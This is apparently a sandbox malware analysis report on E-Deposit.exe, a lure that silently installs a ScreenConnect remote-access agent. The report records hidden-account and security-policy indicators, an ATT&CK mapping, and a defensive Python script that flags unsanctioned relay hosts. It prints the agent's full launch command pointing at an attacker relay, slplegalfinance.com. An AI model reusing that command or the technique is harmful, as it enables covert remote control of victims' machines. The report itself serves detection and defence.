                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3539290767.000000001B812000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: E-Deposit.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.4.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: C:\Users\user\Desktop\E-Deposit.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Process information set: NOOPENFILEERRORBOX (50 identical entries)
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 1780000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 3410000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 1990000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 6AA0000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 6270000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 7AA0000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 8AA0000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 6AA0000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 6AA0000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: 8D20000 memory reserve | memory write watch
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Memory allocated: 17B0000 memory reserve | memory write watch
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Memory allocated: 2110000 memory reserve | memory write watch
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Memory allocated: 1FA0000 memory reserve | memory write watch
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Memory allocated: 2760000 memory reserve | memory write watch
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Memory allocated: 1AA00000 memory reserve | memory write watch
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Thread delayed: delay time: 922337203685477
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll
                                   Source: C:\Windows\SysWOW64\msiexec.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\MSID590.tmp
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll
                                   Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\MSID7B3.tmp
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dll
                                   Source: C:\Users\user\Desktop\E-Deposit.exe TID: 7296; Thread sleep time: -922337203685477s >= -30000s
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7708; Thread sleep count: 40 > 30
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7832; Thread sleep time: -34000s >= -30000s
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 7876; Thread sleep time: -60000s >= -30000s
                                   Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation (2 identical entries)
                                   Source: C:\Windows\System32\msiexec.exe; File Volume queried: C:\ FullSizeInformation (5 identical entries)
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Thread delayed: delay time: 922337203685477
                                   Source: ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                   Source: C:\Windows\System32\msiexec.exe; Process information queried: ProcessInformation
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Process token adjusted: Debug
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Process token adjusted: Debug
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Memory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                   Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                   Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                   Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                   Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                   Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.cs; Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                   Source: 0.2.E-Deposit.exe.3370000.0.raw.unpack, Program.cs; Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                   Source: unknown; Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"
                                   Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Progman
                                   Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                   Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
                                   Source: C:\Windows\System32\msiexec.exe; Queries volume information: C:\ VolumeInformation
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll VolumeInformation
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll VolumeInformation
                                   Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation (2 identical entries)
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Code function: 7_2_05CB17B8 CreateNamedPipeW, 7_2_05CB17B8
                                   Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe; Code function: 7_2_017B4C63 RtlGetVersion, 7_2_017B4C63
                                   Source: C:\Users\user\Desktop\E-Deposit.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
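The most actionable row in this section is the ScreenConnect.ClientService.exe process creation: its only argument is the client launch string ("?e=access&y=guest&h=slplegalfinance.com&p=443&s=...&k=..."), which names the relay the agent will call home to. The script below is an added example for this report, not code from Joe Sandbox or ConnectWise. It pulls that argument out of a recorded command line (Sysmon event 1, EDR telemetry, or this report), URL-decodes it, and flags agents whose relay host is not on a sanctioned list. The key meanings (e = session type, with "access" being the unattended-access agent; y = process type; h = relay host; p = relay port; s = session GUID; k = server key, base64 then URL-encoded) are the editor's reading of the launch string and are not stated on the page. The report shows the command line lowercased, so the base64 k value copied from it cannot be decoded; the example records only that a key is present. The sanctioned relay support.example.com and the second, benign command line are constructed for illustration.

```python
"""Triage ScreenConnect client launch strings from process-creation telemetry.

Added example for this report, not code from Joe Sandbox or ConnectWise.
"""
import re
from typing import Iterable, Optional
from urllib.parse import parse_qs

# Constructed sample input: the ScreenConnect.ClientService.exe command line
# recorded in the report above, copied verbatim (the sandbox shows it
# lowercased, so the base64 key in k= is not decodable from this copy).
REPORT_CMDLINE = (
    '"c:\\program files (x86)\\screenconnect client (484f9eed1d8e13b9)\\screenconnect.clientservice.exe" '
    '"?e=access&y=guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2'
    '&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews'
    '%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw'
    '%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk'
    '%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv"'
)

# Constructed benign comparison with the same layout, pointing at a
# hypothetical in-house relay (support.example.com is an assumption).
SANCTIONED_CMDLINE = (
    '"c:\\program files (x86)\\screenconnect client (0123456789abcdef)\\screenconnect.clientservice.exe" '
    '"?e=access&y=guest&h=support.example.com&p=443&s=11111111-2222-3333-4444-555555555555&k=abcd"'
)

LAUNCH_ARG_RE = re.compile(r'"(\?[^"]*)"')  # a quoted argument that starts with '?'
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)


def extract_launch_string(cmdline: str) -> Optional[str]:
    """Return the quoted '?...' argument of a command line, or None if absent."""
    m = LAUNCH_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def parse_launch_string(launch: str) -> dict:
    """Split '?a=1&b=2' into {'a': '1', 'b': '2'}, URL-decoding values (%2f -> '/', %2b -> '+')."""
    return {k: v[0] for k, v in parse_qs(launch[1:], keep_blank_values=True).items()}


def triage(cmdline: str, sanctioned_relays: Iterable[str]) -> Optional[dict]:
    """Describe a ScreenConnect client launch; None for command lines that are not one."""
    if "screenconnect" not in cmdline.lower():
        return None
    launch = extract_launch_string(cmdline)
    if launch is None:
        return None
    params = parse_launch_string(launch)
    host = params.get("h", "").lower()           # editor's reading: relay host
    session = params.get("s", "")                # editor's reading: session GUID
    unsanctioned = host not in {r.lower() for r in sanctioned_relays}
    return {
        "relay": f"{host}:{params.get('p', '')}",
        "session_type": params.get("e"),         # "access" = unattended-access agent
        "process_type": params.get("y"),
        "session_id": session,
        "session_id_is_guid": bool(GUID_RE.match(session)),
        "has_server_key": bool(params.get("k")),
        "unattended": params.get("e", "").lower() == "access",
        "suspicious": unsanctioned,
    }


def suspicious_relays(cmdlines: Iterable[str], sanctioned_relays: Iterable[str]) -> list:
    """Return the relay host:port of every ScreenConnect launch not on the sanctioned list."""
    sanctioned = set(sanctioned_relays)
    hits = []
    for line in cmdlines:
        result = triage(line, sanctioned)
        if result and result["suspicious"]:
            hits.append(result["relay"])
    return hits


if __name__ == "__main__":
    for line in (REPORT_CMDLINE, SANCTIONED_CMDLINE):
        print(triage(line, {"support.example.com"}))
```

Run over process-creation logs, `suspicious_relays` returns the relay for the report's agent (slplegalfinance.com:443) and nothing for the constructed in-house one; in an environment that does not use ScreenConnect at all, pass an empty sanctioned list so every agent is reported.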

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                   Source: C:\Windows\System32\msiexec.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                                   Source: Yara match; File source: E-Deposit.exe, type: SAMPLE
                                   Source: Yara match; File source: 0.2.E-Deposit.exe.5c50000.10.raw.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 8.0.ScreenConnect.WindowsClient.exe.6f0000.0.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 0.2.E-Deposit.exe.5c50000.10.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 8.2.ScreenConnect.WindowsClient.exe.2a7fa10.4.raw.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 0.0.E-Deposit.exe.b95db0.3.raw.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 0.0.E-Deposit.exe.ae63d4.4.raw.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 0.0.E-Deposit.exe.ad0000.0.unpack, type: UNPACKEDPE
                                   Source: Yara match; File source: 00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                   Source: Yara match; File source: 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                   Source: Yara match; File source: 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                   Source: Yara match; File source: 00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                   Source: Yara match; File source: 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                   Source: Yara match; File source: 00000000.00000002.1678535852.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                   Source: Yara match; File source: Process Memory Space: E-Deposit.exe PID: 7276, type: MEMORYSTR
                                   Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7468, type: MEMORYSTR
                                   Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7728, type: MEMORYSTR
                                   Source: Yara match; File source: C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP, type: DROPPED
                                   Source: Yara match; File source: C:\Windows\Temp\~DF85B4BC076AE408FE.TMP, type: DROPPED
                                   Source: Yara match; File source: C:\Windows\Temp\~DF86AC890801A3F764.TMP, type: DROPPED
                                   Source: Yara match; File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                   Source: Yara match; File source: C:\Config.Msi\59d35d.rbs, type: DROPPED
                                   Source: Yara match; File source: C:\Windows\Temp\~DFC2C1B5F26C92D1A2.TMP, type: DROPPED
                                   Source: Yara match; File source: C:\Windows\Temp\~DF0DB2C6A1117BC15C.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF324137F551FF48C3.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSID57F.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Only flagged cells are listed below; the number before a technique is the count shown in its matrix cell.

Initial Access: 1 Valid Accounts; 1 Replication Through Removable Media
Execution: 1 Native API; 12 Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Component Object Model Hijacking; 1 Valid Accounts; 2 Windows Service; 1 Bootkit
Privilege Escalation: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Component Object Model Hijacking; 1 Valid Accounts; 1 Access Token Manipulation; 2 Windows Service; 13 Process Injection
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 File Deletion; 22 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 31 Virtualization/Sandbox Evasion; 13 Process Injection; 1 Hidden Users; 1 Bootkit; 1 Rundll32
Discovery: 11 Peripheral Device Discovery; 1 File and Directory Discovery; 14 System Information Discovery; 1 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion
Collection: 11 Archive Collected Data
Command and Control: 12 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
Reconnaissance, Resource Development, Credential Access, Lateral Movement, Exfiltration, Impact: no flagged techniques

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
Behavior Graph ID: 1584729
Sample: E-Deposit.exe
Start date: 06/01/2025
Architecture: WINDOWS
Score: 66

(Numbers after a process name are the per-process counts shown in the graph; see the legend above.)

Start
  DNS/IP: slplegalfinance.com
  Signatures: Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; .NET source code references suspicious native API functions; 4 other signatures
  Started processes:
    msiexec.exe (94, 51)
      Dropped: ScreenConnect.Wind...dentialProvider.dll (PE32+); C:\...\ScreenConnect.ClientService.exe (PE32); C:\Windows\Installer\MSID7B3.tmp (PE32); 9 other files (none is malicious)
      Signatures: Enables network access during safeboot for specific services; Modifies security policies related information
      Started: msiexec.exe; msiexec.exe (1); msiexec.exe
        msiexec.exe started rundll32.exe (11)
          Dropped: C:\Users\user\...\ScreenConnect.Windows.dll (PE32); C:\...\ScreenConnect.InstallerActions.dll (PE32); C:\Users\user\...\ScreenConnect.Core.dll (PE32); 4 other files (none is malicious)
          Signatures: Contains functionality to hide user accounts
    ScreenConnect.ClientService.exe (17, 25)
      DNS/IP: slplegalfinance.com 185.143.228.176, 443, 49731, 49732, ASDETUKhttpwwwheficedcomGB, Germany
      Signatures: Reads the Security eventlog; Reads the System eventlog
      Started: ScreenConnect.WindowsClient.exe (2)
        Signatures: Contains functionality to hide user accounts
    E-Deposit.exe (6)
      Dropped: C:\Users\user\AppData\...-Deposit.exe.log (ASCII)
      Signatures: Contains functionality to hide user accounts
      Started: msiexec.exe (6)
        Dropped: C:\Users\user\AppData\Local\...\MSICCC5.tmp (PE32)

Source | Detection | Scanner | Label | Link
E-Deposit.exe | 26% | ReversingLabs | Win32.Exploit.ScreenConnectTool |
E-Deposit.exe | 32% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
